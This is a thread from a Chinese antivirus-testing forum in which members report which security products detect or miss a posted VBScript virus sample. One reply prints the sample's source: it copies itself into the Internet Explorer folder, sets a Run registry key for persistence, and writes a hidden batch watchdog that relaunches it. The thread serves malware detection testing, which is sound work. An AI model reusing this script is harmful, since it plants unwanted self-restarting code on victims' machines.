查看: 1393|回复: 12
收起左侧

[病毒样本] 再来个VB

[复制链接]
光墓啊
发表于 2021-1-15 11:18:49 | 显示全部楼层 |阅读模式
见附件

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
353963191
发表于 2021-1-15 11:24:10 | 显示全部楼层
火绒miss  智量miss
狂欢...
发表于 2021-1-15 11:28:27 | 显示全部楼层
virus.vbs.sysautorun.a

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
z68436425
发表于 2021-1-15 11:31:45 | 显示全部楼层
ESETmiss
ELOHIM
发表于 2021-1-15 11:34:27 | 显示全部楼层
微软扫描没反应。
秋日之殇
发表于 2021-1-15 11:40:16 | 显示全部楼层
卡巴斯基

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
superax
发表于 2021-1-15 11:49:56 | 显示全部楼层
McAfee VSE miss
温馨小屋
头像被屏蔽
发表于 2021-1-15 13:44:30 | 显示全部楼层
MES miss
温馨小屋
头像被屏蔽
发表于 2021-1-15 13:45:18 | 显示全部楼层
Filename: vbs.vbs
Threat name: ISB.Downloader!gen52Full Path: C:\Users\NortonLTSC\Desktop\vbs.vbs

____________________________

____________________________


On computers as of 
2021/1/15 at 13:45:07

Last Used 
2021/1/15 at 13:45:07

Startup Item 
No

Launched 
No

Threat type: Heuristic Virus. Detection of a threat based on malware heuristics.


____________________________


vbs.vbs Threat name: ISB.Downloader!gen52
Locate


Very Few Users
Fewer than 5 users in the Norton Community have used this file.

Very New
This file was released less than 1 week  ago.

High
This file risk is high.


____________________________


Source: External Media


____________________________

File Actions

File: C:\Users\NortonLTSC\Desktop\ vbs.vbs Blocked
____________________________


File Thumbprint - SHA:
Not available
File Thumbprint - MD5:
Not available
QVM360
发表于 2021-1-15 13:53:44 | 显示全部楼层
  1. On Error Resume Next
  2. set xfso=createobject("scripting.filesystemobject")
  3. set xwsh=createobject("wscript.shell")
  4. if xfso.fileexists("C:\Program Files\Internet Explorer\sys.vbs")=false then
  5.     xfso.copyfile wscript.scriptfullname,"C:\Program Files\Internet Explorer\sys.vbs",true
  6.     xwsh.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\open","C:\Program Files\Internet Explorer\sys.vbs"
  7.     wscript.quit
  8. end if
  9. set x1=xfso.opentextfile("C:\Program Files\Internet Explorer\ie.bat",2,true)
  10. x1.writeline "[url=home.php?mod=space&uid=331734]@echo[/url] off"
  11. x1.writeline "type sys.vbs > system.txt"
  12. x1.writeline ":loop"
  13. x1.writeline "tasklist | find /i " & chr(34) & "wscript.exe" & chr(34) & "||goto :a"
  14. x1.writeline "ping -n 5 127.1>nul"
  15. x1.writeline "goto :loop"
  16. x1.writeline ":a"
  17. x1.writeline "type system.txt > sys.vbs"
  18. x1.writeline "sys.vbs"
  19. x1.writeline "ping -n 5 127.1>nul"
  20. x1.writeline "goto :loop"
  21. x1.close
  22. xwsh.run "ie.bat",0
  23. copy()
  24. dead()
  25. xwsh.run "sys.vbs"

  26. function copy()
  27. end function

  28. function dead()
  29. end function
复制代码
放anyrun里了,没啥行为
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-4 11:34 , Processed in 0.146886 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表